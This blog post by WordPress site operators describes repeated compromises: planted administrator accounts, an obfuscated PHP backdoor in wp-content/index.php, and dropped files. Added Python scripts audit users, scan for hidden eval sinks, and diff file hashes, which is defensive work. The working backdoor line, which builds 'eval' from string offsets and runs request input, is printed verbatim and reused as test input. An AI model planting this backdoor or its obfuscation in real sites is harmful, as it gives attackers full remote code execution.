Our WordPress website keeps getting hacked

By , last updated June 28, 2019

We are running several websites with WordPress in different categories, everything from blogs to online shops. WordPress is great: it is easy and powerful at the same time. There is one thing, though, that makes us doubt the platform: our WordPress websites get hacked, especially the more popular ones.

Hackers use different techniques to grant themselves illegal access. In this post we will share our most recent experiences with our hacked WordPress sites.

Adding new users

One of the most obvious attacks on our blog was new users that were added to the wp_users table. They were mostly users with the usernames "admin" and "administrator" and empty or unreal email addresses. A real user could not normally have registered with such email addresses, so that was an obvious sign of a break-in. We had also disabled registrations. Here are the ones we got last time:

  • Username: admin
    Email: admin@localhost
    Password in WordPress:
    Password hash in database: b53e60a7b7977245431786c2cf03b69d
  • Username: admin92
    Email: admin@localhost
    Password in WordPress:
    Password hash in database: 771229431367b01fc178dd5f89e0b201
  • Username: administrator
    Email:
    Password in WordPress:
    Password hash in database: 543678431367b01fc178dd5f89f0b403

Simply deleting these users didn't help much: they reappeared days later.

To solve the problem, we changed the new users' role to "Subscriber" and replaced their passwords and email addresses. All the data the hackers had inserted into the database was thereby overwritten with our own.

We aren’t sure what caused it, but it was probably a bug in a plugin or theme. The problem disappeared after a while.
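One detail of the accounts listed above is worth checking for on any site: the three password hashes are bare 32-character hex strings, i.e. plain MD5. WordPress itself writes phpass hashes (starting with $P$) when a password is set through the application, but it still accepts a legacy MD5 value in user_pass and only rehashes it after a successful login. A row with an MD5 hash is therefore a row that was written directly into the database, not created through WordPress. The following audit script is an added example, not code from this post; it uses an in-memory SQLite stand-in for the wp_users and wp_usermeta tables (the real ones are MySQL, the queries are portable), seeds it with the three accounts from the post plus one constructed legitimate editor (the "maria" row and its phpass hash are made up), and flags accounts by hash format, email, generic login name and administrator capability. The demote helper mirrors the first-aid step described above (the role lives in wp_usermeta under wp_capabilities); it does not replace the password or email, which still have to be changed, and it does not find the hole through which the rows were inserted.

```python
import re
import sqlite3

# Hash formats WordPress accepts in user_pass: the normal 34-character phpass
# hash ("$P$..." or "$H$...") and, for backwards compatibility, a bare 32-hex
# MD5 that is only upgraded after the account logs in successfully.
LEGACY_MD5 = re.compile(r"^[0-9a-f]{32}$")
PHPASS = re.compile(r"^\$[PH]\$[./0-9A-Za-z]{31}$")
GENERIC_ADMIN = re.compile(r"^admin(istrator)?\d*$", re.IGNORECASE)

# PHP-serialized role arrays as stored in wp_usermeta (meta_key wp_capabilities).
ADMIN_CAPS = 'a:1:{s:13:"administrator";b:1;}'
SUBSCRIBER_CAPS = 'a:1:{s:10:"subscriber";b:1;}'

# Sample rows constructed for this example: the three planted accounts from
# the post plus one legitimate editor ("maria" and her hash are made up).
# Column order mirrors wp_users: ID, user_login, user_pass, user_email, user_registered.
SAMPLE_USERS = [
    (1, "maria", "$P$BqJ7k2xT9fQ0sA1dZ3hG5mN8vC4bR6e", "maria@example.org", "2018-03-01 10:00:00"),
    (2, "admin", "b53e60a7b7977245431786c2cf03b69d", "admin@localhost", "2019-06-20 03:14:07"),
    (3, "admin92", "771229431367b01fc178dd5f89e0b201", "admin@localhost", "2019-06-20 03:14:08"),
    (4, "administrator", "543678431367b01fc178dd5f89f0b403", "", "2019-06-20 03:14:09"),
]
SAMPLE_META = [
    (1, "wp_capabilities", 'a:1:{s:6:"editor";b:1;}'),
    (2, "wp_capabilities", ADMIN_CAPS),
    (3, "wp_capabilities", ADMIN_CAPS),
    (4, "wp_capabilities", ADMIN_CAPS),
]


def build_sample_db():
    """In-memory stand-in for the two WordPress tables the audit needs."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT,"
        " user_email TEXT, user_registered TEXT);"
        "CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY AUTOINCREMENT,"
        " user_id INTEGER, meta_key TEXT, meta_value TEXT);"
    )
    conn.executemany("INSERT INTO wp_users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    conn.executemany(
        "INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)", SAMPLE_META
    )
    return conn


def classify_hash(user_pass):
    if PHPASS.match(user_pass):
        return "phpass"
    if LEGACY_MD5.match(user_pass):
        return "legacy-md5"
    return "unknown"


def audit_users(conn, prefix="wp_"):
    """Return {user_login: [reasons]} for every account that looks planted."""
    if not re.fullmatch(r"[A-Za-z0-9_]+", prefix):  # table names cannot be bound parameters
        raise ValueError("table prefix must be alphanumeric")
    rows = conn.execute(
        f"SELECT u.ID, u.user_login, u.user_pass, u.user_email, m.meta_value "
        f"FROM {prefix}users u "
        f"LEFT JOIN {prefix}usermeta m ON m.user_id = u.ID AND m.meta_key = ?",
        (prefix + "capabilities",),
    ).fetchall()
    findings = {}
    for _uid, login, pwd, email, caps in rows:
        reasons = []
        kind = classify_hash(pwd)
        if kind != "phpass":
            reasons.append(f"{kind} password hash (not set through WordPress)")
        if not email or "@" not in email or email.endswith("@localhost"):
            reasons.append("bogus email address")
        if GENERIC_ADMIN.match(login):
            reasons.append("generic admin login")
        if reasons and caps and "administrator" in caps:
            reasons.append("holds administrator capability")
        if reasons:
            findings[login] = reasons
    return findings


def demote_to_subscriber(conn, user_id, prefix="wp_"):
    """First-aid step from the post: strip the role. Password and email still need changing."""
    if not re.fullmatch(r"[A-Za-z0-9_]+", prefix):
        raise ValueError("table prefix must be alphanumeric")
    conn.execute(
        f"UPDATE {prefix}usermeta SET meta_value = ? WHERE user_id = ? AND meta_key = ?",
        (SUBSCRIBER_CAPS, user_id, prefix + "capabilities"),
    )
    conn.commit()


if __name__ == "__main__":
    db = build_sample_db()
    for login, reasons in audit_users(db).items():
        print(f"{login}: " + "; ".join(reasons))
```

Against a live site, point the same queries at the MySQL database (the table prefix is the one set in wp-config.php) and treat every account with a legacy MD5 hash as evidence of direct database access, which means the web server, a plugin with an SQL injection, or the database credentials themselves should be suspected rather than just the login form.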

Inserting code

Sometimes we find files that were changed without our consent and without us noticing right away. Closer investigation shows that the injected code is seldom something we can spot immediately. We often end up reinstalling all WordPress core files just to be sure there are no surprises hidden in them, and to remove files that are not supposed to be there. But sometimes we do see the changes, and they are ingenious (and obfuscated)!

The easiest way to backdoor a website is to insert a call to eval or base64_decode. Once that code is in place, the attacker can call it with his key and do whatever he wants. The problem for him is that everybody knows this, and many protection tools and plugins scan for such obvious patterns right away. This is where the ingenuity comes in: how do you hide it?

The last time we spotted new code it was inside the index.php in the wp-content folder (wp-content/index.php). That file is normally empty apart from the comment "Silence is golden". This time it contained the following snippet:

<?php
'v1'; $e = ' avel'; $f = create_function('', $e{3}.$e{2}.$e{1}.$e{4} .'( stripslashes( @ $_REQUEST["FFfertrNTAoTgRLOacet"] ) );' ); $f();

The line was inserted while we were testing some new plugins on our beta website, which is actually CLOSED to the outside world by .htaccess directives. Could one of the plugins have inserted the code? Maybe. Inspecting the involved plugins yielded nothing. It could be anything.

If you look at this code, it is actually rather clever:

  1. It creates a variable $e holding the string " avel".
  2. It then builds a function with create_function whose body is assembled from single characters of $e taken in the order 3-2-1-4 (PHP string offsets are zero-based), which spells "eval", followed by a call that feeds the request parameter to it. The word "eval" never appears in the file.
  3. When the attacker requests the file with the parameter FFfertrNTAoTgRLOacet (via $_REQUEST, so GET, POST or cookie), whatever PHP he sends is executed with the web server's privileges, which means complete control of the site. At that point all passwords (user accounts and database) must be considered compromised and changed. The database contents are not safe either: posts may have had hidden backlinks and possibly further backdoors inserted.

As explained above, scanning such code with antivirus software or a signature-based plugin typically yields no warnings, because the telltale string is never present literally.
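A scanner that wants to catch this has to do a little more than grep for "eval(". The following static scanner is an added example, not code from this post: it looks for the literal sinks, for untrusted request input, and, the part a signature scanner lacks, for strings rebuilt from single-character offsets of a constant ($e{3}.$e{2}.$e{1}.$e{4} or the equivalent $e[3] form), resolving them to see whether they spell a dangerous function name. It also checks that any index.php sitting in one of the directories where WordPress ships a "Silence is golden" placeholder still contains nothing but comments. The snippet from the post is embedded as test input; the demo directory tree, the stock placeholder text and the list of placeholder directories are assumptions made for the example.

```python
import re
import tempfile
from pathlib import Path

# The backdoor from the post, embedded here as constructed test input.
BACKDOOR = """<?php
'v1'; $e = ' avel'; $f = create_function('', $e{3}.$e{2}.$e{1}.$e{4} .'( stripslashes( @ $_REQUEST["FFfertrNTAoTgRLOacet"] ) );' ); $f();
"""
# What a placeholder index.php normally contains (assumed stock content).
STOCK_INDEX = "<?php\n// Silence is golden.\n"

DANGEROUS = {"eval", "assert", "system", "exec", "passthru", "shell_exec", "popen", "proc_open"}
LITERAL_SINKS = re.compile(r"\b(eval|assert|create_function|base64_decode|gzinflate|str_rot13)\s*\(")
REQUEST_INPUT = re.compile(r"\$_(?:REQUEST|GET|POST|COOKIE)\b")
# $name = 'literal';  (single or double quoted, same line)
STR_ASSIGN = re.compile(r"\$(\w+)\s*=\s*(['\"])(.*?)\2\s*;")
# A run of $var{N} or $var[N] joined by the concatenation operator.
OFFSET_RUN = re.compile(r"(?:\$\w+[{\[]\d+[}\]]\s*\.\s*)+\$\w+[{\[]\d+[}\]]")
OFFSET = re.compile(r"\$(\w+)[{\[](\d+)[}\]]")
COMMENT = re.compile(r"/\*.*?\*/|(?://|#)[^\n]*", re.S)  # approximation: ignores '#' inside strings
PLACEHOLDER_DIRS = {"wp-content", "plugins", "themes", "uploads"}  # assumption


def resolve_offset_strings(src):
    """Rebuild every string assembled from single-character offsets of string constants."""
    consts = {name: value for name, _quote, value in STR_ASSIGN.findall(src)}
    rebuilt = []
    for run in OFFSET_RUN.finditer(src):
        chars = []
        for var, idx in OFFSET.findall(run.group(0)):
            value = consts.get(var)
            if value is None or int(idx) >= len(value):
                chars = None  # offset into something we cannot resolve statically
                break
            chars.append(value[int(idx)])
        if chars:
            rebuilt.append("".join(chars))
    return rebuilt


def scan_source(src):
    findings = []
    for m in LITERAL_SINKS.finditer(src):
        findings.append(f"literal call to {m.group(1)}()")
    for name in resolve_offset_strings(src):
        if name.lower() in DANGEROUS:
            findings.append(f"string offsets assemble '{name}'")
    if REQUEST_INPUT.search(src):
        findings.append("reads untrusted request input ($_REQUEST/$_GET/$_POST/$_COOKIE)")
    return findings


def is_silence_placeholder(src):
    """True if the file contains nothing but the PHP open tag and comments."""
    body = COMMENT.sub("", src).replace("<?php", "").replace("?>", "")
    return body.strip() == ""


def scan_tree(root):
    """Return {relative path: [findings]} for every suspicious .php file under root."""
    root = Path(root)
    report = {}
    for path in root.rglob("*.php"):
        src = path.read_text(errors="replace")
        findings = scan_source(src)
        if (path.name == "index.php" and path.parent.name in PLACEHOLDER_DIRS
                and not is_silence_placeholder(src)):
            findings.append("placeholder index.php contains real code")
        if findings:
            report[path.relative_to(root).as_posix()] = findings
    return report


def build_demo_tree():
    """Constructed demo: the backdoored wp-content/index.php next to a clean placeholder."""
    root = Path(tempfile.mkdtemp(prefix="wp-scan-"))
    (root / "wp-content" / "plugins").mkdir(parents=True)
    (root / "wp-content" / "index.php").write_text(BACKDOOR)
    (root / "wp-content" / "plugins" / "index.php").write_text(STOCK_INDEX)
    return root


if __name__ == "__main__":
    for rel, findings in scan_tree(build_demo_tree()).items():
        print(rel)
        for f in findings:
            print("  -", f)
```

On the snippet from the post the scanner reports the literal create_function() call, the offsets assembling "eval", and the $_REQUEST read; the offset resolution is what turns the first two from "odd-looking PHP" into a confirmed code-execution backdoor. It is still pattern matching: a variant that builds the name with chr() or from a base64 blob needs another resolver, which is why reinstalling core files and diffing against a known-good copy remains the reliable check.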

Adding new files

We discover new files in our WordPress installations approximately once a year. They are usually added without us noticing. Keeping the installation in a version control system like Git and reviewing all new changes from time to time helps spot the problem early.

The only thing to do when you see new files is to reinstall WordPress. Get the newest version. Remove all unnecessary plugins. Inspect all your own files thoroughly for changes around the time your website was hacked, and check the web server log from around the time the file was modified.
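Version control only catches what is committed, and uploads and caches usually are not. A hash baseline taken after a clean install does the same job for the whole tree, and the diff tells you exactly which files appeared or changed, which are the timestamps to look up in the web server log. The following is an added example, not code from this post: it records a SHA-256 per file, compares two snapshots, and demonstrates the result on a constructed miniature site tree (the file names, the dropped "cache-helper.php" and the appended line are all made up for the demo). The skipped directories are an assumption that your site keeps no PHP under uploads or cache.

```python
import hashlib
import json
import os
import tempfile
from pathlib import Path

# Directories excluded from the baseline (assumption: no PHP should live here).
SKIP_DIRS = {"wp-content/uploads", "wp-content/cache"}


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root, skip_dirs=SKIP_DIRS):
    """Map every file under root (relative POSIX path) to its SHA-256."""
    root = Path(root)
    result = {}
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = Path(dirpath).relative_to(root).as_posix()
        # Prune skipped directories in place so os.walk does not descend into them.
        dirnames[:] = [
            d for d in dirnames
            if (d if rel_dir == "." else f"{rel_dir}/{d}") not in skip_dirs
        ]
        for name in filenames:
            p = Path(dirpath) / name
            result[p.relative_to(root).as_posix()] = sha256_file(p)
    return result


def diff_snapshots(baseline, current):
    """Files added, modified or removed since the baseline was taken."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])
    return {"added": added, "modified": modified, "removed": removed}


def save_baseline(snap, path):
    Path(path).write_text(json.dumps(snap, indent=1, sort_keys=True))


def load_baseline(path):
    return json.loads(Path(path).read_text())


def build_demo_site():
    """Constructed miniature WordPress tree for the demo."""
    root = Path(tempfile.mkdtemp(prefix="wp-demo-"))
    (root / "wp-content" / "plugins").mkdir(parents=True)
    (root / "wp-content" / "uploads").mkdir()
    (root / "index.php").write_text("<?php require __DIR__ . '/wp-blog-header.php';\n")
    (root / "wp-content" / "index.php").write_text("<?php\n// Silence is golden.\n")
    (root / "wp-content" / "uploads" / "photo.jpg").write_bytes(b"\xff\xd8\xff")
    return root


def simulate_compromise(root):
    """Made-up attacker actions: drop a new file and append code to the placeholder."""
    root = Path(root)
    (root / "wp-content" / "plugins" / "cache-helper.php").write_text("<?php /* dropped */\n")
    with open(root / "wp-content" / "index.php", "a") as fh:
        fh.write("$x = $_REQUEST['k'];\n")


def run_demo():
    root = build_demo_site()
    baseline_file = root.parent / (root.name + ".baseline.json")
    save_baseline(snapshot(root), baseline_file)
    simulate_compromise(root)
    return diff_snapshots(load_baseline(baseline_file), snapshot(root))


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=1))
```

Store the baseline JSON outside the web root (an attacker who can write index.php can also rewrite a baseline kept next to it). For the core files and directory plugins specifically, WP-CLI already ships this comparison against the checksums published by wordpress.org as wp core verify-checksums and wp plugin verify-checksums; the script above covers everything else, including the files that are not supposed to exist at all.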

We will update if we’re hacked again.

Update
About 6 months ago we decided to try out the Wordfence plugin for WordPress. It worked well for our blog-type website, but the plugin slowed our eCommerce stores with a lot of images down horribly.